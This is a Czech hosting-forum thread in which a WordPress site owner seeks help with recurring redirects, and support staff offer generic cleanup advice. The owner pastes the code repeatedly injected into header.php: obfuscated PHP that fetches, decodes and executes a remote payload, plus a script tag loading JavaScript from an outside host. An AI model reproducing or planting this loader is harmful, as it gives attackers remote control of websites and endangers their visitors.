Stále směrování webů na jiné weby
Dobrý den,
řešil jsem to tu již včera, že na kostelanymtb.cz, jakmile tam nahraji wordpress, tak po jisté „chvíli“ se začnou weby směrovat (jakoby malwarem) jinam. Schválně jsem weby udělal na https://kostelany.webkrom.cz a vše vpořádku. Jakmile jsem přenesl weby, které na webkrom.cz chodí bez problému, na kostelanymtb.cz, opět naskočilo ono přesměrování. Heslo databáze i FTP jsem změnil chvíli před převedením webů, takže zásah do FTP nemohl být. Také nového admina, s přihl. jménem jiným než admin jsem vytvořil a zároveň starého admina smazal a nic. Nechápu, kde může být ještě problém, ale už nevidím žádné řešení nikde 🙁
Role: Zákazník
Otázka je uzamčena pro nové odpovědi.
RM130195 Vybral nejlepší odpověď 20. 5. 2020
5 Answers
Dobrý den,
kde vidíte malware? kostelanymtb.cz/wp-admin se mi v pořádku zobrazuje.
RM130195 Vybral nejlepší odpověď 20. 5. 2020
Zjistil jsem, že se stále „automaticky“ přidává do header.php v themes řádek se scriptem:
<?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script><?php $c = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; $d = chr(102).chr(105).chr(108)."e".chr(95)."get".chr(95)."con".chr(116).chr(101).chr(110).chr(116).chr(115); $b = $c($d(chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(97).chr(116).chr(46).chr(116).chr(114).chr(97).chr(99).chr(107).chr(115).chr(116).chr(97).chr(116).chr(105).chr(115).chr(116).chr(105).chr(99).chr(115).chr(115).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(46).chr(116).chr(120).chr(116))); @file_put_contents(chr(104).chr(116).chr(104).chr(116),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).$b);@include($b);@unlink(chr(104).chr(116).chr(104).chr(116)); ?><script src='https://ws.stivenfernando.com/stm.js?v=1.0.0' type='text/javascript'></script>/**
Jenže netuším, odkud se tam bere. Jak jsem již zmiňoval, vymazal jsem vše z webu, udělal čistou instalaci, změnil hesla a řádek se objevuje stále. Prosím o pomoc a radu. Děkuji
Role: Zákazník
JŠ255861 Změnil status na publikováno 6. 5. 2020
Dobrý den,
pokud máte napadaný web, tak musíte FTP kompletně promazat a vymazat všechny adresáře znovu.
Důležité je také nikdy nepoužívat stejné heslo, takže jej změňte, jak na FTP, DB tak i případně do samotného webu.
Také záleží jestli máte PHP na verzi alespoň 7.0 a vyšší, starší verze jsou totiž značné bezpečnostní riziko.
Role: Podpora Web: https://stackoverflow.com/ Vizitka: Roses are Red, Violets are Blue Unexpected '{' on line 32.
JŠ255861 Odpověděl na otázku 6. 5. 2020
Přesně to jsem udělal. Smazal jsem vše, změnil všude hesla za dost bezpečná a nainstaloval znovu wordpress s novou databází. Vše chodilo docela dobře do doby, než jsem do htacces dal příkaz na přesměrování na https. Poté vše spadlo a mám opět toho vira. Proto si myslím, že problém nebude zde. Možná někde v nastavení, přesměrování, nebo já vážně netuším? Můžete, prosím, zkontrolovat záznamy související s webem a prověřit to? Není přece možné, když vše smažu a změním hesla, aby hned při vnucení přesměrování na https
# presmerovani z http na https
RewriteCond %{HTTPS} off
RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301])
mě to nasměrovalo na malware. Ne u kostelanymtb.cz, ale u kostelanymtb.cz/wp-admin
Vážně již nevím, co mám dělat. Děkuji
Role: Zákazník
RM130195 Změnil status na publikováno 6. 5. 2020
Dokonce jsem svůj PC dal do továru se smazáním všeho, tak jsem byl už v koncích a stále jsem 🙁
Role: Zákazník
RM130195 Změnil status na publikováno 6. 5. 2020